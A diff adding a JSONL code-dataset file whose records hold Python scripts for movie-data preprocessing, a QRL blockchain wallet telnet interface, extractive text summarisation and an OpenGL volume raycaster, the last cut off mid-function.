diff --git "a/462.jsonl" "b/462.jsonl"
new file mode 100644
--- /dev/null
+++ "b/462.jsonl"
@@ -0,0 +1,763 @@
+{"seq_id":"573379885","text":"#### THE CODE IN THIS FILE IS SOURCED FROM THE LINK IN README.MD ###\n\n\n# This file converts the original \"tmdb_5000\" data from kaggle into data that can be used\n# for recommendation. Involves joining tables with movie metadata (crew, cast, etc.) and movie information\n# into one. New data is written to a .csv file and then read when using the program. This file is only run once\n# to create the \"movie_data.csv\" file.\n\nimport numpy as np\nimport pandas as pd\nfrom ast import literal_eval\n\ndf1 = pd.read_csv(r'C:\Users\rishi_rhvenli\PycharmProjects\MovieRec\Data\tmdb_5000_credits.csv')\ndf2 = pd.read_csv(r'C:\Users\rishi_rhvenli\PycharmProjects\MovieRec\Data\tmdb_5000_movies.csv')\ndf1.columns = ['id', 'title', 'cast', 'crew']\n\n# Merge the 2 dataframes by movie-id\ndf2 = df2.merge(df1, on='id')\n\ndf2['overview'] = df2['overview'].fillna('')\n\nfeatures = ['cast', 'crew', 'genres']\nfor feature in features:\n    df2[feature] = df2[feature].apply(literal_eval)\n\n\n# Extract the director from the crew-list\ndef get_director(x):\n    for i in x:\n        if i['job'] == 'Director':\n            return i['name']\n    return np.nan\n\n\n# Used to extract the top-4 items in a list (eg: top 4 cast members in a movie)\ndef get_list(x):\n    if isinstance(x, list):\n        names = [i['name'] for i in x]\n        if len(names) > 4:\n            names = names[:4]\n        return names\n    return []\n\n\n# Extracts the director and other meta-information from the dataframe\ndf2['director'] = df2['crew'].apply(get_director)\nfeatures = ['cast', 'genres']\nfor feature in features:\n    df2[feature] = df2[feature].apply(get_list)\n\n\n# Converts data in 'x' to lower case and removes all spaces.\n# Done to differentiate, for example, Chris Pratt from Chris Evans\ndef clean_data(x):\n    if isinstance(x, list):\n        return [str.lower(i.replace(\" \", \"\")) for i in x]\n    else:\n        if isinstance(x, str):\n            return str.lower(x.replace(\" \", \"\"))\n        else:\n            return ''\n\n\n# Cleans the data in the newly made columns\nfeatures = ['cast', 'director', 'genres']\nfor feature in features:\n    df2[feature] = df2[feature].apply(clean_data)\ndf2['new_title'] = df2['original_title'].apply(clean_data)\n\n\n# Creates a 'soup' of information that can be used to check for 'similar' movies\ndef create_soup(x):\n    return ' ' + ' '.join(x['cast']) + ' ' + x['director'] + ' ' + ' '.join(x['genres'])\n\n\ndf2['soup'] = df2.apply(create_soup, axis=1)\ndf2.to_csv(r'C:\Users\rishi_rhvenli\PycharmProjects\MovieRec\Data\movie_data.csv', index=None, header=True)\n# DATA PROCESSING ENDS\n\n","sub_path":"PythonFiles/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"475296891","text":"# coding=utf-8\n# Distributed under the MIT software license, see the accompanying\n# file LICENSE or http://www.opensource.org/licenses/mit-license.php.\n\nimport time\nfrom io import StringIO\n\nimport simplejson as json\nfrom twisted.internet.protocol import Protocol, connectionDone\n\nfrom pyqrllib.pyqrllib import mnemonic2bin, hstr2bin, bin2hstr\nfrom qrl.core import helper, logger, config\nfrom qrl.crypto.words import wordlist\nfrom qrl.crypto.xmss import XMSS\n\n\ndef hexseed_to_seed(hex_seed):\n    if len(hex_seed) != 96:\n        return False\n    return hstr2bin(hex_seed)\n\n\n# FIXME: Clean this up\n\nclass WalletProtocol(Protocol):\n    def 
__init__(self):\n self.cmd_mapping = {\n \"create\": self._create,\n \"getnewaddress\": self._getnewaddress,\n \"hexseed\": self._hexseed,\n \"seed\": self._seed,\n \"search\": self._search,\n \"json_block\": self._json_block,\n \"savenewaddress\": self._savenewaddress,\n \"recoverfromhexseed\": self._recoverfromhexseed,\n \"recoverfromwords\": self._recoverfromwords,\n \"stake\": self._stake,\n \"stakenextepoch\": self._stakenextepoch,\n \"send\": self._send,\n \"mempool\": self._mempool,\n \"help\": self._help,\n \"quit\": self._quit,\n \"exit\": self._quit,\n \"wallet\": self._wallet,\n \"getinfo\": self._getinfo,\n \"blockheight\": self._blockheight,\n \"peers\": self._peers,\n \"reboot\": self._reboot,\n }\n self.cmd_list = list(self.cmd_mapping.keys())\n\n self.output = {'status': 1,\n 'keys': [],\n 'message': StringIO()}\n\n self.isJSON = False\n\n def parse_cmd(self, data):\n # Parse out passed in argument to get:\n # 1. Command ([0])\n # 1. 0-Many arguments ([1:])\n\n # Get entered line as an array of strings delimited by \"space.\"\n # Will chomp away any extra spaces\n data = data.split()\n # Arguments include anything beyond the first index\n\n if len(data) != 0: # if anything was entered\n\n command = data[0]\n args = None\n if len(data) > 0: # args optional\n args = data[1:]\n\n if command in self.cmd_mapping:\n self.cmd_mapping[command](args)\n\n else:\n return False\n\n return True\n\n # Called when a command is recieved through telnet\n # Might be a good idea to use a json encrypted wallet\n def dataReceived(self, data):\n try:\n data = data.strip().decode()\n\n self.factory.recn += 1\n self.isJSON = False\n if data.lower().startswith('json '):\n self.isJSON = True\n data = data[5:]\n\n if not self.parse_cmd(data):\n self.output['status'] = 1\n self.output['message'].write(\">>> Command not recognised. Use 'help' for details \\r\\n\")\n except KeyboardInterrupt as e:\n self.output['message'] = StringIO()\n self.output['message'].write('Unexpected Error\\r\\nReport to QRL Developers')\n logger.error('Unexpected Error WalletProtocol\\n')\n logger.exception(e)\n\n self.output['message'] = self.output['message'].getvalue()\n\n try:\n if self.isJSON:\n self.transport.write('%s' % (str(json.dumps(self.output)),))\n else:\n self.transport.write(bytes(str(self.output['message']), 'utf-8'))\n except Exception as e:\n logger.error('Walletprotocol unexpected exception while sending msg to client')\n logger.exception(e)\n\n del self.output\n self.output = {'status': 1,\n 'keys': [],\n 'message': StringIO()}\n\n # What does this do?\n # whenever you type telnet 127.0.0.1 2000\n # a connection is made and this function is called to initialize the things.\n def connectionMade(self):\n self.transport.write(b'QRL node connection established. Try starting with \"help\" ')\n self.factory.connections += 1\n if self.factory.connections > 1:\n logger.info('only one local connection allowed')\n self.transport.write(b'only one local connection allowed, sorry')\n self.transport.loseConnection()\n else:\n if self.transport.getPeer().host == '127.0.0.1':\n logger.info('>>> new local connection %s %s', str(self.factory.connections), self.transport.getPeer())\n else:\n self.transport.loseConnection()\n logger.info('Unauthorised remote login attempt..')\n\n def connectionLost(self, reason=connectionDone):\n self.factory.connections -= 1\n\n ###################################### LOCAL WALLET ACCESS ###############################################\n\n # Pseudocode:\n\n # is chain up to date? 
If not, fail/inform user\n    # is address null/void? If it is, fail/print usage instructions\n    # is the first letter of the address Q? If not, fail/print usage instructions\n    # is the address in use? If not, fail/inform user\n\n    # if all of these are met, return the balance\n    def getbalance(self, addr):\n        self.output['status'] = 1\n\n        # is chain up to date? If not, fail/inform user\n        if self.factory.state.state_uptodate(self.factory.chain.height()) is False:\n            self.output['message'].write('>>> LevelDB not up to date..\r\n')\n            # add \"force\" argument to bring it up to date and get balance?\n            return\n\n        # is address null/void? If it is, fail/print usage instructions\n        if not addr:\n            self.output['message'].write('>>> Usage: getbalance <address> (Addresses begin with Q)\r\n')\n            return\n\n        # is the first letter of the address Q? If not, fail/print usage instructions\n        if addr[0][0] != 'Q':\n            self.output['message'].write('>>> Usage: getbalance <address> 
(Addresses begin with Q)\r\n')\n            return\n\n        # is the address in use? If not, fail/inform user\n        if self.factory.state.state_address_used(addr[0]) is False:\n            self.output['message'].write('>>> Unused address: ' + addr[0] + '\r\n')\n            return\n\n        # if all of these are met, return the balance\n        self.output['status'] = 0\n        balance = self.factory.state.state_balance(addr[0])\n        self.output['message'].write('>>> balance: ' + str(balance) + '\r\n')\n        self.output['keys'] += ['balance']\n        self.output['balance'] = balance\n        return\n\n    # Pseudocode:\n    # If no arguments are used, or more than 3 are used, fail/inform user of usage\n    # else:\n    #   get signature type to use, reject if the type is incorrect\n    #   prevent user from generating an extremely large number of XMSS signatures\n    #   generate address\n    #   inform user of address information\n    #   tell them how to save the address to wallet file\n    def _getnewaddress(self, args):\n        self.output['status'] = 0\n        self.output['message'].write('>>> Creating new address, please be patient as this can take some time ...\r\n')\n        self.output['keys'] += ['keypair_type', 'possible_signatures', 'address']\n\n        addr_bundle = self.factory.chain.wallet.get_new_address()\n\n        self.output['message'].write('>>> Keypair type: ' + ''.join(addr_bundle[1].get_type() + '\r\n'))\n        self.output['message'].write(\n            '>>> Signatures possible with address: ' + str(addr_bundle[1].get_number_signatures()) + '\r\n')\n        self.output['message'].write('>>> Address: ' + addr_bundle[1].get_address() + '\r\n')\n\n        self.output['keypair_type'] = ''.join(addr_bundle[1].get_type() + '\r\n')\n        self.output['possible_signatures'] = str(addr_bundle[1].get_number_signatures())\n        self.output['address'] = addr_bundle[1].get_address()\n\n        # TODO: Would you like to save this address to your wallet file (call savenewaddress)? Y/N\n        self.output['message'].write(\">>> type 'savenewaddress' to append to wallet file\" + '\r\n')\n        self.factory.newaddress = addr_bundle\n\n    # Simply saves wallet information\n    def _savenewaddress(self, args):\n        self.output['status'] = 1\n        if not self.factory.newaddress:\n            self.output['message'].write(\">>> No new addresses created, yet. Try 'getnewaddress'\" + '\r\n')\n            return\n        self.output['status'] = 0\n        self.factory.chain.wallet.append_wallet(self.factory.newaddress)\n        self.output['message'].write('>>> new address saved in self.factory.chain.wallet.\r\n')\n        return\n\n    # This method is for sending between local wallets as well as network wallets\n    def _send(self, args):\n        self.output['status'] = 1\n        if not args or len(args) < 3:\n            self.output['message'].write('>>> Usage: send <from> <to> <amount> [<fee>]\r\n')\n            self.output['message'].write('>>> i.e. 
send 0 4 100 5\\r\\n')\n self.output['message'].write('>>> ^ will send 100 coins from address 0 to 4 from the wallet\\r\\n')\n self.output['message'].write('>>> can be a pasted address (starts with Q)\\r\\n')\n self.output['message'].write('>>> 5 is the txn fee\\r\\n')\n return\n\n wallet_from = args[0]\n wallet_to = args[1]\n amount_arg = args[2]\n fee_arg = 0\n if len(args) == 4:\n fee_arg = args[3]\n\n qrlnode = self.factory.qrlnode\n\n ########################\n ########################\n\n try:\n wallet_from = qrlnode.get_wallet_absolute(wallet_from)\n wallet_to = qrlnode.get_wallet_absolute(wallet_to)\n amount = qrlnode.get_dec_amount(amount_arg)\n fee = qrlnode.get_dec_amount(fee_arg)\n\n tx = qrlnode.transfer_coins(wallet_from, wallet_to, amount, fee)\n\n except Exception as e:\n self.output['message'].write(str(e))\n return\n\n ########################\n ########################\n # FIXME: Clean below\n\n self.output['status'] = 0\n self.output['message'].write('>>> ' + bin2hstr(tx.txhash))\n # FIXME: Review all quantities\n # FIXME: Magic number? Unify\n self.output['message'].write('>>> From: ' + str(tx.txfrom) + ' To: ' + str(tx.txto) + ' For: ' + str(\n tx.amount / 100000000.000000000) + ' Fee: ' + str(tx.fee / 100000000.000000000) + '\\r\\n')\n self.output['message'].write('>>>created and sent into p2p network\\r\\n')\n\n def _wallet(self, args):\n if not self.factory.state.state_uptodate(self.factory.chain.height()):\n self.factory.state.state_read_chain(self.factory.chain)\n\n self.output['status'] = 0\n self.output['message'].write('>>> Wallet contents:\\r\\n')\n self.output['keys'] += ['list_addresses']\n self.output['list_addresses'] = {}\n\n list_addr, list_addresses = self.factory.chain.wallet.list_addresses(self.factory.chain.state,\n self.factory.chain.transaction_pool, True)\n self.output['list_addresses'] = list_addresses\n\n y = 0\n for address in list_addr:\n self.output['message'].write(str(y) + str(address) + '\\r\\n')\n y += 1\n\n def _create(self, args):\n self.factory.p2pFactory.pos.create_next_block(int(args[0]))\n self.output['status'] = 0\n self.output['message'].write('Creating blocknumber #' + str(args[0]))\n\n def _hexseed(self, args):\n for addr_bundle in self.factory.chain.wallet.address_bundle:\n if isinstance(addr_bundle.xmss, XMSS):\n self.output['status'] = 0\n self.output['message'].write('Address: ' + addr_bundle.xmss.get_address() + '\\r\\n')\n self.output['message'].write('Recovery seed: ' + addr_bundle.xmss.get_hexseed() + '\\r\\n')\n self.output['keys'] += ['Address', 'Recovery seed']\n self.output['Address'] = addr_bundle.xmss.get_address()\n self.output['Recovery seed'] = addr_bundle.xmss.get_hexseed()\n\n def _seed(self, args):\n for addr_bundle in self.factory.chain.wallet.address_bundle:\n if isinstance(addr_bundle.xmss, XMSS):\n self.output['status'] = 0\n self.output['message'].write('Address: ' + addr_bundle.xmss.get_address() + '\\r\\n')\n self.output['message'].write('Recovery seed: ' + addr_bundle.xmss.get_mnemonic() + '\\r\\n')\n self.output['keys'] += ['Address', 'Recovery seed']\n\n def _search(self, args):\n if not args:\n self.output['status'] = 1\n self.output['message'].write('>>> Usage: search \\r\\n')\n return None\n\n tmp_output = None\n if args[0][0] == 'Q':\n # FIXME: Accessing private member\n # FIXME: Access to another\n tmp_output = json.loads(self.factory.apiFactory.search_address(args[0]))\n self.output['message'].write('Address: ' + str(args[0]))\n self.output['message'].write('\\r\\nBalance: ' + 
str(tmp_output['state']['balance']))\n self.output['message'].write('\\r\\nTransactions: ' + str(tmp_output['state']['transactions']))\n for tx in tmp_output['transactions']:\n self.output['message'].write(str(tx['txhash']))\n self.output['message'].write(' ')\n self.output['message'].write(str(tx['txfrom']))\n self.output['message'].write(' ')\n self.output['message'].write(str(tx['txto']))\n self.output['message'].write(' ')\n self.output['message'].write(str(tx['amount']))\n self.output['message'].write('\\r\\n')\n else:\n tmp_output = json.loads(self.factory.apiFactory.search_txhash(args[0]))\n self.output['message'].write('Txnhash: ')\n self.output['message'].write(args[0])\n if tmp_output['status'] == 'Error':\n self.output['message'].write('\\r\\n')\n self.output['message'].write(str(tmp_output['error']))\n self.output['message'].write('\\r\\n')\n return True\n self.output['message'].write('\\r\\nTimestamp: ')\n self.output['message'].write(tmp_output['timestamp'])\n self.output['message'].write('\\r\\nBlockNumber: ')\n self.output['message'].write(tmp_output['block'])\n self.output['message'].write('\\r\\nConfirmations: ')\n self.output['message'].write(tmp_output['confirmations'])\n self.output['message'].write('\\r\\nAmount: ')\n self.output['message'].write(tmp_output['amount'])\n self.output['message'].write('\\r\\n')\n\n if not tmp_output:\n self.output['status'] = 1\n self.output['message'].write('>>> No Information available')\n return True\n\n for key in list(tmp_output.keys()):\n self.output['keys'] += [str(key)]\n self.output[key] = tmp_output[key]\n\n self.output['status'] = 0\n self.output['message'].write('')\n\n def _json_block(self, args):\n if not args:\n self.output['message'].write(\n helper.json_print_telnet(self.factory.chain.m_get_last_block()) + '\\r\\n')\n return True\n try:\n int(args[0])\n except:\n self.output['message'].write('>>> Try \"json_block \" \\r\\n')\n return True\n\n if int(args[0]) > self.factory.chain.m_blockheight():\n self.output['message'].write('>>> Block > Blockheight\\r\\n')\n return True\n self.output['status'] = 0\n self.output['message'].write(\n helper.json_print_telnet(self.factory.chain.m_get_block(int(args[0]))) + '\\r\\n')\n\n def _recoverfromhexseed(self, args):\n if not args or not hexseed_to_seed(args[0]):\n self.output['message'].write('>>> Usage: recoverfromhexseed \\r\\n')\n self.output['message'].write('>>> Could take up to a minute..\\r\\n')\n self.output['message'].write('>>> savenewaddress if Qaddress matches expectations..\\r\\n')\n return True\n\n self.output['status'] = 0\n addr = self.factory.chain.wallet.get_new_address(address_type='XMSS', seed=hexseed_to_seed(args[0]))\n self.factory.newaddress = addr\n self.output['message'].write('>>> Recovery address: ' + addr[1].get_address() + '\\r\\n')\n self.output['message'].write('>>> Recovery seed phrase: ' + addr[1].get_mnemonic() + '\\r\\n')\n self.output['message'].write('>>> hexSEED confirm: ' + addr[1].get_hexseed() + '\\r\\n')\n self.output['message'].write('>>> savenewaddress if Qaddress matches expectations..\\r\\n')\n\n self.output['keys'] += ['recovery_address', 'recovery_seed_phrase', 'hexseed_confirm']\n self.output['recovery_address'] = addr[1].get_address()\n self.output['recovery_seed_phrase'] = addr[1].get_mnemonic()\n self.output['hexseed_confirm'] = addr[1].get_hexseed()\n\n def _recoverfromwords(self, args):\n if not args:\n self.output['message'].write(\n '>>> Usage: recoverfromwords \\r\\n')\n return True\n self.output['message'].write('>>> 
trying..this could take up to a minute..\\r\\n')\n if len(args) != 32:\n self.output['message'].write(\n '>>> Usage: recoverfromwords \\r\\n')\n return True\n\n args = ' '.join(args)\n addr = self.factory.chain.wallet.get_new_address(address_type='XMSS', seed=mnemonic2bin(args, wordlist))\n self.factory.newaddress = addr\n self.output['status'] = 0\n self.output['message'].write('>>> Recovery address: ' + addr[1].get_address() + '\\r\\n')\n self.output['message'].write('>>> Recovery hexSEED: ' + addr[1].get_hexseed() + '\\r\\n')\n self.output['message'].write('>>> Mnemonic confirm: ' + addr[1].get_mnemonic() + '\\r\\n')\n self.output['message'].write('>>> savenewaddress if Qaddress matches expectations..\\r\\n')\n\n self.output['keys'] += ['recovery_address', 'recovery_hexseed', 'mnemonic_confirm']\n self.output['recovery_address'] = addr[1].get_address()\n self.output['recovery_hexseed'] = addr[1].get_hexseed()\n self.output['mnemonic_confirm'] = addr[1].get_mnemonic()\n\n def _stake(self, args):\n self.output['status'] = 0\n self.output['message'].write(\n '>> Toggling stake from: ' + str(self.factory.p2pFactory.stake) + ' to: ' + str(\n not self.factory.p2pFactory.stake) + '\\r\\n')\n self.factory.p2pFactory.stake = not self.factory.p2pFactory.stake\n logger.info(('STAKING set to: ', self.factory.p2pFactory.stake))\n self.output['keys'] += ['stake']\n self.output['stake'] = self.factory.p2pFactory.stake\n\n def _stakenextepoch(self, args):\n self.output['status'] = 0\n self.output['message'].write(\n '>>> Sending a stake transaction for address: ' + self.factory.chain.mining_address + ' to activate next epoch(' + str(\n config.dev.blocks_per_epoch - (\n self.factory.chain.m_blockchain[-1].blockheader.blocknumber - (\n self.factory.chain.m_blockchain[\n -1].blockheader.epoch * config.dev.blocks_per_epoch))) + ' blocks time)\\r\\n')\n\n logger.info(('STAKE for address:', self.factory.chain.mining_address))\n\n blocknumber = self.factory.chain.block_chain_buffer.height() + 1\n self.factory.p2pFactory.pos.make_st_tx(blocknumber=blocknumber, first_hash=None)\n\n def _mempool(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Number of transactions in memory pool: ' + str(\n len(self.factory.chain.transaction_pool)) + '\\r\\n')\n self.output['keys'] += ['txn_nos']\n self.output['txn_nos'] = len(self.factory.chain.transaction_pool)\n\n def _help(self, args):\n self.output['status'] = 0\n self.output['message'].write(\n '>>> QRL ledger help: try {}'.format(', '.join(self.cmd_list)) + '\\r\\n')\n\n def _quit(self, args):\n self.transport.loseConnection()\n\n def _getinfo(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Version: ' + config.dev.version_number + '\\r\\n')\n self.output['message'].write('>>> Uptime: ' + str(time.time() - self.factory.start_time) + '\\r\\n')\n self.output['message'].write(\n '>>> Nodes connected: ' + str(len(self.factory.p2pFactory.peer_connections)) + '\\r\\n')\n self.output['message'].write('>>> Staking set to: ' + str(self.factory.p2pFactory.stake) + '\\r\\n')\n self.output['message'].write('>>> Sync status: ' + self.factory.p2pFactory.nodeState.state.name + '\\r\\n')\n\n self.output['keys'] += ['version', 'uptime', 'nodes_connected', 'staking_status', 'sync_status']\n self.output['version'] = config.dev.version_number\n self.output['uptime'] = str(time.time() - self.factory.start_time)\n self.output['nodes_connected'] = str(len(self.factory.p2pFactory.peer_connections))\n self.output['staking_status'] = 
str(self.factory.p2pFactory.stake)\n self.output['sync_status'] = self.factory.p2pFactory.nodeState.state.name\n\n def _blockheight(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Blockheight: ' + str(self.factory.chain.m_blockheight()) + '\\r\\n')\n self.output['message'].write(\n '>>> Headerhash: ' + bin2hstr(self.factory.chain.m_blockchain[-1].blockheader.headerhash) + '\\r\\n')\n\n self.output['keys'] += ['blockheight', 'headerhash']\n self.output['blockheight'] = self.factory.chain.m_blockheight()\n self.output['headerhash'] = bin2hstr(self.factory.chain.m_blockchain[-1].blockheader.headerhash)\n\n def _peers(self, args):\n self.output['status'] = 0\n self.output['message'].write('>>> Connected Peers:\\r\\n')\n self.output['keys'] += ['peers']\n self.output['peers'] = {}\n for peer in self.factory.p2pFactory.peer_connections:\n self.output['message'].write(\n '>>> ' + peer.conn_identity + \" [\" + peer.version + \"] blockheight: \" + str(\n peer.blockheight) + '\\r\\n')\n self.output['peers'][peer.conn_identity] = {}\n self.output['peers'][peer.conn_identity]['version'] = peer.version\n self.output['peers'][peer.conn_identity]['blockheight'] = peer.blockheight\n\n def _reboot(self, args):\n if len(args) < 1:\n self.output['message'].write('>>> reboot \\r\\n')\n self.output['message'].write('>>> or\\r\\n')\n self.output['message'].write('>>> reboot \\r\\n')\n self.output['message'].write('>>> or\\r\\n')\n self.output['message'].write('>>> reboot \\r\\n')\n return True\n json_hash, err = None, None\n if len(args) == 3:\n json_hash, status = self.factory.chain.generate_reboot_hash(args[0], args[1], args[2])\n self.output['message'].write(str(args[0]) + str(args[1]) + str(args[2]))\n elif len(args) == 2:\n json_hash, status = self.factory.chain.generate_reboot_hash(args[0], args[1])\n else:\n json_hash, status = self.factory.chain.generate_reboot_hash(args[0])\n\n if json_hash:\n self.factory.p2pFactory.send_reboot(json_hash)\n # self.factory.state.update(NState.synced)\n self.output['message'].write(status)\n","sub_path":"qrl/core/walletprotocol.py","file_name":"walletprotocol.py","file_ext":"py","file_size_in_byte":23919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196747040","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 19 20:27:13 2020\n\n@author: GUPTA50\n\"\"\"\n\n#Importing the required libraries\nimport re\nimport nltk\nimport heapq\n\n\narticle_text = \"\"\n\n\n#Reading the data from the text file and creating article text\ndef text_read():\n with open(\"Economy.txt\", \"r\") as f:\n paragraphs = f.readlines()\n return paragraphs\n\n\ndef Text_processing():\n global article_text\n paragraphs = text_read()\n for p in paragraphs:\n article_text += p\n # Removing Square Brackets and Extra Spaces\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n # Removing special characters and digits\n formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )\n #Creating a list of the stopwords using nltk library\n stopwords = nltk.corpus.stopwords.words('english')\n word_frequencies = {}\n #Creating a dictionary, which has the frequence for each word like if GST is encountered seven times it will be like \"GST\": 7\n for word in nltk.word_tokenize(formatted_article_text):\n if word not in stopwords:\n if word not in word_frequencies.keys():\n word_frequencies[word] = 1\n else:\n word_frequencies[word] += 1\n\n 
maximum_frequency = max(word_frequencies.values())\n    # to find the weighted frequency\n    for word in word_frequencies.keys():\n        word_frequencies[word] = (word_frequencies[word]/maximum_frequency)\n    sentence_list = nltk.sent_tokenize(article_text)\n    # Calculation of sentence scores\n    sentence_scores = {}\n    for sent in sentence_list:\n        for word in nltk.word_tokenize(sent.lower()):\n            if word in word_frequencies.keys():\n                if len(sent.split(' ')) < 30:\n                    if sent not in sentence_scores.keys():\n                        sentence_scores[sent] = word_frequencies[word]\n                    else:\n                        sentence_scores[sent] += word_frequencies[word]\n\n    return sentence_scores\n\n\n# Taking the top 10 sentences to create the brief summary of the article\ndef summary():\n    # Call Text_processing() only once: each call appends to the global\n    # article_text, so calling it twice would duplicate the article text.\n    sentence_scores = Text_processing()\n    summary_sentences = heapq.nlargest(10, sentence_scores, key=sentence_scores.get)\n    summary = ' '.join(summary_sentences)\n    with open(\"Economic_Summarization.txt\", \"w\") as f:\n        f.write(summary)\n\n\nif __name__ == '__main__':\n    summary()","sub_path":"Text_Summarization.py","file_name":"Text_Summarization.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"423812375","text":"\"\"\"\nraycaster_cc6.py\n\n# Copyright (c) 2021, Minho Kim\n# Computer Graphics Lab, Dept. of Computer Science, University of Seoul\n# All rights reserved.\n\n\"\"\"\nfrom OpenGL.GL import *\nimport numpy as np\nimport os\nimport glfw\nimport glm\n\nclass VolumeInfo:\n    def __init__(self, filename, dtype, dim, scale, level, inverted):\n        self.filename = filename\n        self.dtype = dtype\n        self.dim = dim\n        self.scale = scale\n        self.level = level\n        self.inverted = inverted\n\ntry:\n    path_volume = os.environ['VOLUME_PATH']\nexcept KeyError:\n    # fall back to the current directory if VOLUME_PATH is not set\n    path_volume = './'\n\nvolumes = {\n    'ML_25': VolumeInfo(path_volume + 'ML_25_f32.raw', np.float32, (49,49,49), (1,1,1), 0.5, False),\n    'ML_50': VolumeInfo(path_volume + 'ML_50_f32.raw', np.float32, (99,99,99), (1,1,1), 0.5, False),\n    }\n\n###################################################################################################################\n# bounding box of the volume\n#\n# - the bounding box may be composed of smaller min/max boxes for culling\n###################################################################################################################\nclass BBox:\n    # dim: resolution of the volume dataset\n    # scale: scaling of the volume dataset. 
Strictly speaking, if scale is not (1,1,1) \n # then we get a different lattice.\n#------------------------------------------------------------------------------------------------------------------------ \n def __init__(self, _dim, scale, size_fbo):\n self.dim = _dim\n\n self.fbo = FBO_bbox(size_fbo[0], size_fbo[1])\n\n # - Shaders to render the bounding box containing the whole volume.\n # - Used to set the starting/ending point of each ray.\n # - Less efficient than using `bbox_minmax.*' shaders.\n # - Used when `minmax' parameter of `render' function is FALSE.\n self.prog_bbox = Program('bbox.vert', 'bbox.frag', ['MVP', 'scale']) \n\n self.size = self.dim\n\n # - Used to fit the whole volume in viewport by re-scaling.\n self.size_max = max(self.size)\n\n # - The scaling of the bounding box.\n # - We obtain the properly scaled bounding box by applying this to a unit cube.\n self.scale_bbox = tuple(self.size[i]/self.size_max for i in range(3))\n\n # - Used to convert from [0,1]^3 space to the lattice space.\n # - Passed as `scale_axes' to raycasting shader.\n self.scale_axes = tuple(((self.dim[i])*self.size[i])/self.size_max for i in range(3))\n\n positions = np.array([ 0, 0, 1,\n 1, 0, 1,\n 1, 1, 1,\n 0, 1, 1,\n 0, 0, 0,\n 1, 0, 0,\n 1, 1, 0,\n 0, 1, 0],\n dtype=np.float32)\n indices = np.array([ 0, 1, 2, 2, 3, 0, # front\n 1, 5, 6, 6, 2, 1, # top\n 7, 6, 5, 5, 4, 7, # back\n 4, 0, 3, 3, 7, 4, # bottom\n 4, 5, 1, 1, 0, 4, # left\n 3, 2, 6, 6, 7, 3 # right\n ], dtype=np.int8)\n \n # Setting up the VAO for the bbox\n self.vao = glGenVertexArrays(1)\n glBindVertexArray(self.vao)\n\n self.vbo_position = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo_position)\n glBufferData(GL_ARRAY_BUFFER, len(positions)*ctypes.sizeof(ctypes.c_float), positions, GL_STATIC_DRAW)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, None)\n\n self.vbo_idx = glGenBuffers(1)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vbo_idx)\n self.size_indices = len(indices)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(indices)*ctypes.sizeof(ctypes.c_ubyte), indices, GL_STATIC_DRAW)\n\n glBindVertexArray(0)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render(self, MVP):\n glUseProgram(self.prog_bbox.id)\n glUniformMatrix4fv(self.prog_bbox.uniform_locs['MVP'], 1, GL_FALSE, MVP)\n glUniform3fv(self.prog_bbox.uniform_locs['scale'], 1, self.scale_bbox)\n glBindVertexArray(self.vao)\n glDrawElements(GL_TRIANGLES, self.size_indices, GL_UNSIGNED_BYTE, ctypes.c_void_p(0))\n glBindVertexArray(0)\n glUseProgram(0)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render_backfaces(self, MVP):\n glDepthFunc(GL_GREATER)\n glClearDepth(0)\n glClearColor(0, 0, 0, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n glEnable(GL_CULL_FACE)\n glCullFace(GL_FRONT)\n self.render(MVP)\n glDisable(GL_CULL_FACE)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render_frontfaces(self, MVP):\n glDepthFunc(GL_LESS)\n glClearDepth(1)\n glClearColor(0, 0, 0, 1)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n glEnable(GL_CULL_FACE)\n glCullFace(GL_BACK)\n self.render(MVP)\n glDisable(GL_CULL_FACE)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def render_bbox(self, MVP):\n 
glViewport(0, 0, self.fbo.width, self.fbo.height)\n glBindFramebuffer(GL_FRAMEBUFFER, self.fbo.fbo)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.fbo.buf_back, 0)\n self.render_backfaces(MVP)\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.fbo.buf_front, 0)\n self.render_frontfaces(MVP)\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n###################################################################################################################\nclass Volume:\n\n#------------------------------------------------------------------------------------------------------------------------ \n def __init__(self, info, size_fbo_bbox):\n\n self.load_data(info)\n\n self.bbox = BBox(self.info.dim, self.info.scale, size_fbo_bbox)\n\n self.dim_tex = [self.info.dim[0], self.info.dim[1], self.info.dim[2], 1]\n\n self.upload_data()\n \n#------------------------------------------------------------------------------------------------------------------------ \n def load_data(self, info):\n self.info = info\n scale = 1\n\n self.dim_max = max(max(self.info.dim[0], self.info.dim[1]), self.info.dim[2])\n \n # Always keep in float32 format...\n self.data = np.fromfile(info.filename, dtype=info.dtype).astype(np.float32)*scale\n\n#------------------------------------------------------------------------------------------------------------------------ \n def upload_data(self):\n if self.dim_tex[3] == 1:\n internal_format = GL_R32F\n format = GL_RED\n elif self.dim_tex[3] == 2:\n internal_format = GL_RG32F\n format = GL_RG\n\n self.texid = glGenTextures(1)\n 